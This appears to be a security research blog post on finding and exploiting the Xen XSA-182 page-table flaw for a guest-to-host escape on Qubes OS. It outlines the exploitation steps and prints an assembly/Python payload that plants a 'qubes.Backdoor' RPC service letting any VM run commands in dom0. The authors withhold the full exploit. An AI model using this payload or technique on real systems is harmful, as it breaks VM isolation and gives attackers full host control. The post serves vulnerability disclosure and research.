Authors Jérémie Boutoille, Gabriel Campana

Category Exploitation

Tags Xen, exploitation, PoC, guest-to-host, vm escape, Qubes OS, 2016

This is the last part of our blogpost series about Xen security [1] [2]. This time we write about a vulnerability we found (XSA-182) [0] (CVE-2016-6258) and its exploitation on the Qubes OS [3] project.

We first explain the methodology used to find the vulnerability, then the specifics of exploiting it on Qubes OS.

We would like to emphasize that the vulnerability is not in the code of Qubes OS. But since Qubes OS relies on the Xen hypervisor, it is affected by this vulnerability. More information is provided by Qubes' security bulletin #24 [8].

tl;dr



This screenshot shows a fresh install of Qubes OS. The terminal is running inside an untrusted VM to which an attacker gained access. The exploitation of the vulnerability gave him full control over dom0. Thanks to a little shell script, he can execute any command in dom0 (as shown by the gray borders and the title [Dom0] Calculator of xcalc), and thus gain access to other VMs as well. For instance, qvm-run work xcalc launched the xcalc command in the work VM.

Finding the vulnerability

After writing the exploit of XSA-148 [2], we were curious about the internals of the memory management of paravirtualized guests. Because a PV guest kernel runs in ring 3, every privileged operation has to be done through hypercalls. Xen must be able to emulate some mechanisms in order to keep the kernel inside ring 3. With paravirtualization, jumping from ring 3 to ring 0 rhymes with VM-escape.

GDT example

Let's take an interesting example: the Global Descriptor Table (GDT). The GDT contains information about memory segments, but can also contain call-gates, trap-gates, task state segments (TSS) and task gates. These mechanisms allow privilege switching. Some of them are quite complex and must therefore be rigorously validated on every GDT update. Each page used to hold the GDT is passed to the function alloc_segdesc_page, which calls check_descriptor on each entry. Even if this function is not long, no statement is superfluous:

    /* Returns TRUE if given descriptor is valid for GDT or LDT. */
    int check_descriptor(const struct domain *dom, struct desc_struct *d)
    {
        u32 a = d->a, b = d->b;
        u16 cs;
        unsigned int dpl;

        /* A not-present descriptor will always fault, so is safe. */
        if ( !(b & _SEGMENT_P) )
            goto good;

        /* Check and fix up the DPL. */
        dpl = (b >> 13) & 3;
        __fixup_guest_selector(dom, dpl);
        b = (b & ~_SEGMENT_DPL) | (dpl << 13);

        /* All code and data segments are okay. No base/limit checking. */
        if ( (b & _SEGMENT_S) )
        {
            /* SNIP SNIP SNIP */
            goto good;
        }

        /* Invalid type 0 is harmless. It is used for 2nd half of a call gate. */
        if ( (b & _SEGMENT_TYPE) == 0x000 )
            goto good;

        /* Everything but a call gate is discarded here. */
        if ( (b & _SEGMENT_TYPE) != 0xc00 )
            goto bad;

        /* Validate the target code selector. */
        cs = a >> 16;
        if ( !guest_gate_selector_okay(dom, cs) )
            goto bad;

        /*
         * Force DPL to zero, causing a GP fault with its error code indicating
         * the gate in use, allowing emulation. This is necessary because with
         * native guests (kernel in ring 3) call gates cannot be used directly
         * to transition from user to kernel mode (and whether a gate is used
         * to enter the kernel can only be determined when the gate is being
         * used), and with compat guests call gates cannot be used at all as
         * there are only 64-bit ones.
         * Store the original DPL in the selector's RPL field.
         */
        b &= ~_SEGMENT_DPL;
        cs = (cs & ~3) | dpl;
        a = (a & 0xffffU) | (cs << 16);

        /* Reserved bits must be zero. */
        if ( b & (is_pv_32bit_domain(dom) ? 0xe0 : 0xff) )
            goto bad;

     good:
        d->a = a;
        d->b = b;
        return 1;
     bad:
        return 0;
    }

Diving into this kind of code makes you crazy, and the Intel documentation becomes your only friend for understanding every single bit shift and bit mask. A zealous reader will have noticed in one of the comments of the previous code that call-gates are emulated by forcing the descriptor's DPL to zero, causing a general protection fault on usage. Believe me, the code emulating call-gates is a nightmare (function emulate_gate_op for the curious reader).

Well, since we did not find any vulnerability within GDT management, we took a look at the page table management.
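To make the bit masking above easier to follow, here is a minimal Python sketch that decodes the high 32-bit word of a descriptor in the same order as check_descriptor. The constant values follow the standard x86 descriptor layout and the shifts visible in the code above; the classify and dpl helpers are hypothetical names introduced for illustration, and the sketch performs none of Xen's fix-ups or selector validation.

```python
# Bit layout of the high 32-bit word `b` of an x86 segment descriptor.
SEGMENT_TYPE = 0xF << 8   # type field (bits 8-11)
SEGMENT_S = 1 << 12       # 1 = code/data segment, 0 = system descriptor
SEGMENT_DPL = 3 << 13     # descriptor privilege level (bits 13-14)
SEGMENT_P = 1 << 15       # present bit
CALL_GATE = 0xC00         # type 0xC, the only system type that is accepted


def dpl(b: int) -> int:
    """Extract the DPL, as done by `(b >> 13) & 3` in check_descriptor."""
    return (b & SEGMENT_DPL) >> 13


def classify(b: int) -> str:
    """Apply the tests of check_descriptor in the same order (illustrative only)."""
    if not b & SEGMENT_P:
        return "not present"        # always faults, so considered safe
    if b & SEGMENT_S:
        return "code/data segment"  # accepted without base/limit checks
    if (b & SEGMENT_TYPE) == 0:
        return "type 0"             # harmless, second half of a call gate
    if (b & SEGMENT_TYPE) != CALL_GATE:
        return "rejected"           # TSS, LDT, interrupt/trap gates, ...
    return "call gate"              # accepted, but DPL is forced to zero


if __name__ == "__main__":
    flat_user_code = 0x00CFFA00     # classic flat ring-3 code segment
    print(classify(flat_user_code), dpl(flat_user_code))
    print(classify(SEGMENT_P | 0x900))      # an available TSS
    print(classify(SEGMENT_P | CALL_GATE))
```

Only the last category needs the emulation discussed above; every other system descriptor type is refused outright.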

Page table management

At the beginning, we worked on fuzzing the HYPERVISOR_mmu_update hypercall. The idea is to generate a random page table entry, update the page table and, in case of success, check whether the new mapping is dangerous. So we have to define a list of dangerous mappings, such as:

an L1 entry maps another Lx table with USER and RW flags,

an L2/L3/L4 entry maps another Lx table with PSE, USER and RW flags,

an Ly entry maps another Lx table with USER and RW flags and x != y-1.

Before starting to fuzz, we decided to check manually whether such mappings could be created. The last one is interesting and deserves an explanation. Let's imagine an L4 entry referencing itself with the RW bit set. By using a special virtual address, the L4 becomes writable and every Xen invariant can be bypassed. Xen properly checks for this kind of mapping:

    #define define_get_linear_pagetable(level) \
    static int \
    get_##level##_linear_pagetable( \
        level##_pgentry_t pde, unsigned long pde_pfn, struct domain *d) \
    { \
        unsigned long x, y; \
        struct page_info *page; \
        unsigned long pfn; \
        \
        if ( (level##e_get_flags(pde) & _PAGE_RW) ) \
        { \
            MEM_LOG("Attempt to create linear p.t. with write perms"); \
            return 0; \
        } \
        \
        if ( (pfn = level##e_get_pfn(pde)) != pde_pfn ) \
        { \
            /* Make sure the mapped frame belongs to the correct domain. */ \
            if ( unlikely(!get_page_from_pagenr(pfn, d)) ) \
                return 0; \
            \
            /* \
             * Ensure that the mapped frame is an already-validated page table. \
             * If so, atomically increment the count (checking for overflow). \
             */ \
            page = mfn_to_page(pfn); \
            y = page->u.inuse.type_info; \
            do { \
                x = y; \
                if ( unlikely((x & PGT_count_mask) == PGT_count_mask) || \
                     unlikely((x & (PGT_type_mask|PGT_validated)) != \
                              (PGT_##level##_page_table|PGT_validated)) ) \
                { \
                    put_page(page); \
                    return 0; \
                } \
            } \
            while ( (y = cmpxchg(&page->u.inuse.type_info, x, x + 1)) != x ); \
        } \
        \
        return 1; \
    }

The above code defines the macro used to create the function checking self mapping entries for a given page table level. If such an entry with the RW bit set to 1 is created directly, the hypervisor returns the error Attempt to create linear p.t. with write perms. But with XSA-148 [2] in mind, one can remember that there is a fast-path for safe flags. This fast-path updates the entry without checking invariants because the modified flags are considered safe. _PAGE_RW is part of the flags that are considered safe:

    /* Update the L4 entry at pl4e to new value nl4e. pl4e is within frame pfn. */
    static int mod_l4_entry(l4_pgentry_t *pl4e,
                            l4_pgentry_t nl4e,
                            unsigned long pfn,
                            int preserve_ad,
                            struct vcpu *vcpu)
    {
        struct domain *d = vcpu->domain;
        l4_pgentry_t ol4e;
        int rc = 0;

        if ( unlikely(!is_guest_l4_slot(d, pgentry_ptr_to_slot(pl4e))) )
        {
            MEM_LOG("Illegal L4 update attempt in Xen-private area %p", pl4e);
            return -EINVAL;
        }

        if ( unlikely(__copy_from_user(&ol4e, pl4e, sizeof(ol4e)) != 0) )
            return -EFAULT;

        if ( l4e_get_flags(nl4e) & _PAGE_PRESENT )
        {
            if ( unlikely(l4e_get_flags(nl4e) & L4_DISALLOW_MASK) )
            {
                MEM_LOG("Bad L4 flags %x",
                        l4e_get_flags(nl4e) & L4_DISALLOW_MASK);
                return -EINVAL;
            }

            /* Fast path for identical mapping and presence. */
            if ( !l4e_has_changed(ol4e, nl4e, _PAGE_PRESENT) )
            {
                adjust_guest_l4e(nl4e, d);
                rc = UPDATE_ENTRY(l4, pl4e, ol4e, nl4e, pfn, vcpu, preserve_ad);
                return rc ? 0 : -EFAULT;
            }

This code takes the fast path whenever the mapped frame and the PRESENT flag are unchanged. No other flag is compared, which allows us to set the RW flag on an existing self-mapping entry.
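The comparison behind the fast path can be modelled in a few lines of Python. This is a simplified sketch, not Xen's implementation: entries are plain integers, ADDR_MASK assumes a 52-bit physical address space, and has_changed and takes_fast_path are hypothetical names standing in for l4e_has_changed and the branch shown above.

```python
PAGE_PRESENT = 1 << 0
PAGE_RW = 1 << 1
PAGE_USER = 1 << 2
ADDR_MASK = 0x000FFFFFFFFFF000  # assumed: bits 12-51 hold the frame address


def has_changed(old: int, new: int, flags: int) -> bool:
    """True if the frame address or any bit of `flags` differs between entries."""
    return bool((old ^ new) & (ADDR_MASK | flags))


def takes_fast_path(old: int, new: int) -> bool:
    """Model of the branch guarded by !l4e_has_changed(ol4e, nl4e, _PAGE_PRESENT)."""
    return not has_changed(old, new, PAGE_PRESENT)


if __name__ == "__main__":
    frame = 0x1234 << 12                       # arbitrary example frame
    read_only = frame | PAGE_PRESENT | PAGE_USER
    writable = read_only | PAGE_RW

    # Adding RW leaves the frame and PRESENT untouched: fast path, no checks.
    print(takes_fast_path(read_only, writable))
    # Pointing the entry at another frame goes through full validation.
    print(takes_fast_path(read_only, writable + (1 << 12)))
```

In this model the RW bit is simply outside the mask being compared, which is why the linear page table check is never reached for the second update.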

Basically, we can:

create a self-mapping entry without the RW flag,

add the RW flag through the fast-path,

access the page directory with write permission,

vm escape.

The diagram below illustrates such a memory mapping on entry 42:

    VADDR : (42 << 39) | (42 << 30) | (42 << 21) | (42 << 12)
               +------------+------------+------------+
               |
               |         L4
      CR3 -----|---->+-------------+<-+
               |    0|.............|  |
               |     |.............|  |
               |     |.............|  |
               +-->42|L4, RW, U, P |--+
                     |.............|
                     |.............|
                  511|.............|
                     +-------------+
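The virtual address in the diagram can be computed as follows. This is a small Python sketch of the arithmetic only, assuming standard 4-level x86-64 paging with 9-bit indices; recursive_vaddr and indices are hypothetical helper names.

```python
def recursive_vaddr(slot: int) -> int:
    """Virtual address whose four page-table indices all equal `slot`.

    With a self-referencing L4 entry in `slot`, every level of the page walk
    lands on the L4 page again, so this address maps the L4 page itself.
    """
    if not 0 <= slot < 512:
        raise ValueError("an L4 table has 512 slots")
    va = (slot << 39) | (slot << 30) | (slot << 21) | (slot << 12)
    if slot & 0x100:          # bit 47 set: sign-extend to a canonical address
        va |= 0xFFFF << 48
    return va


def indices(va: int) -> tuple:
    """Split a virtual address into its (L4, L3, L2, L1) table indices."""
    return tuple((va >> shift) & 0x1FF for shift in (39, 30, 21, 12))


if __name__ == "__main__":
    va = recursive_vaddr(42)
    print(hex(va))        # 0x150a8542a000
    print(indices(va))    # (42, 42, 42, 42)
```

Each L4 entry is 8 bytes wide, so entry i of the table sits at this address plus 8 * i.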

Exploitation

The exploitation scenario is exactly the same as in the XSA-148 [2] case:

iterate through the whole host memory,

look for the page directory,

find struct start_info to find the dom0,

find the vDSO page and patch it,

get a root shell within dom0.

As said in the introduction, we decided to exploit the vulnerability in Qubes OS. If you don't know anything about Qubes, here is some information taken from its website [4]:

What is Qubes OS? Qubes is a security-oriented operating system (OS). The OS is the software which runs all the other programs on a computer. Some examples of popular OSes are Microsoft Windows, Mac OS X, Android, and iOS. Qubes is free and open-source software (FOSS). This means that everyone is free to use, copy, and change the software in any way. It also means that the source code is openly available so others can contribute to and audit it. How does Qubes OS provide security? Qubes takes an approach called security by compartmentalization, which allows you to compartmentalize the various parts of your digital life into securely isolated virtual machines (VMs). A VM is basically a simulated computer with its own OS which runs as software on your physical computer. You can think of a VM as a computer within a computer.

Qubes OS uses the Xen hypervisor to manage isolated virtual machines. If an attacker is able to execute code within Qubes' dom0 from a virtual machine, the system no longer provides any security. Code execution in dom0 is already achieved, but because Qubes provides a firewall, we can't use our classic netcat. The payload must be changed.

This is where the Qubes RPC services [5] come in. RPC services allow communication between virtual machines on Qubes OS, such as clipboard, file copy, etc. Each service has a policy specifying a source virtual machine, a target virtual machine and the policy to apply (allow, deny or ask).

The idea is to add an RPC service executing given code in dom0's context. This can be done with an elegant modification of scumjr's [6] assembly payload, executing some Python code that writes a few bash scripts:

    python:
        ;; mov rcx, rip+8
        lea rcx, [rel $ +8]
        ret
        db '-cimport os;x=open("/tmp/.x", "w");x.close();'
        db 'service=open("/etc/qubes_backdoor", "w");'
        db 'service.write("#!/bin/bash\n");'
        db 'service.write("read arg1\n");'
        db 'service.write("($arg1)\n");'
        db 'service.close();'
        db 'os.system("chmod +x /etc/qubes_backdoor");'
        db 'rpc=open("/etc/qubes-rpc/qubes.Backdoor", "w");'
        db 'rpc.write("/etc/qubes_backdoor\n");'
        db 'rpc.close();'
        db 'policy=open("/etc/qubes-rpc/policy/qubes.Backdoor", "w");'
        db 'policy.write("$anyvm dom0 allow");'
        db 'policy.close();'
        db 0

This simply adds a Qubes RPC service named qubes.Backdoor executing every given command.

Because the vulnerability was disclosed only one week ago, we don't want to publish a fully working exploit today and put users at risk. However, a proof of concept telling whether Xen is vulnerable or not is available: xsa-182-poc.tar.gz:

    $ tar xzvf xsa-182-poc.tar.gz
    $ make -C xsa-182-poc/
    $ sudo insmod xsa-182-poc/xsa-182-poc.ko
    $ sudo rmmod xsa-182-poc
    $ dmesg | grep xsa-182

If you use Qubes OS and your version is vulnerable, be safe and update dom0's software via the Qubes VM Manager or with the following command line:

    $ sudo qubes-dom0-update

Hardware virtualization and hypervisor security

The presentation Virtualisation security and the Intel privilege model [9], given at CanSecWest 2010 by Julien Tinnès and Tavis Ormandy, explains the different kinds of virtualization and shows the challenge of developing a secure hypervisor. Paravirtualization is, indeed, extremely complex, and quite similar to binary translation. As said in the presentation, handling all subtleties like a real CPU is difficult. Errors generally lead to privilege escalation in guests or guest-to-host escapes. While binary translation or paravirtualization were mandatory when hardware virtualization didn't exist, the situation has changed drastically since Intel introduced VT-x and AMD introduced SVM.

Hardware virtualization makes the development of hypervisors easier and far more secure, thanks to a few CPU instructions. Second Level Address Translation [10] (EPT for Intel and RVI for AMD) makes it possible to avoid the complexity of shadow page tables. While we didn't run a benchmark, we don't think that the performance difference between paravirtualized and hardware virtualized guests is noticeable.

Moreover, the security of hypervisors relying on hardware virtualization can still be improved. The approach taken by Google to reduce the attack surface of KVM seems appealing [11] [12]. A lot of functionality is moved to userspace, and can thus be easily sandboxed. Also, emulated devices introduce a huge attack surface and KVM, unlike Xen, doesn't seem to be able to isolate devices inside untrusted virtual machines.

Conclusion

Paravirtualization security is really difficult to guarantee. It introduces very complex code and is highly error-prone. The Qubes OS developers have decided to get rid of paravirtualization and make hardware virtualization mandatory from Qubes OS 4.0 [7]. We believe this is a great decision because hardware virtualization is less subject to security bugs.

We recently found another vulnerability affecting paravirtualized guests and allowing guest-to-host escape. However, we don't think another blogpost is needed because this bug is quite similar to this one.

We hope you enjoyed these three Xen posts! I would like to thank everyone who has contributed to these blogposts ;)

| [0] | http://xenbits.xen.org/xsa/advisory-182.html |

| [1] | http://blog.quarkslab.com/xen-exploitation-part-1-xsa-105-from-nobody-to-root.html |

| [2] | http://blog.quarkslab.com/xen-exploitation-part-2-xsa-148-from-guest-to-host.html |

| [3] | https://www.qubes-os.org/ |

| [4] | https://www.qubes-os.org/intro |

| [5] | https://www.qubes-os.org/doc/qrexec3/ |

| [6] | https://scumjr.github.io/2016/01/10/from-smm-to-userland-in-a-few-bytes/ |

| [7] | https://www.qubes-os.org/news/2016/07/21/new-hw-certification-for-q4/ |

| [8] | https://github.com/QubesOS/qubes-secpack/blob/master/QSBs/qsb-024-2016.txt |

| [9] | https://www.cr0.org/paper/jt-to-virtualisation_security.pdf |

| [10] | https://en.wikipedia.org/wiki/Second_Level_Address_Translation |

| [11] | https://lwn.net/Articles/619376/ |

| [12] | http://www.linux-kvm.org/images/f/f6/01x02-KVMHardening.pdf |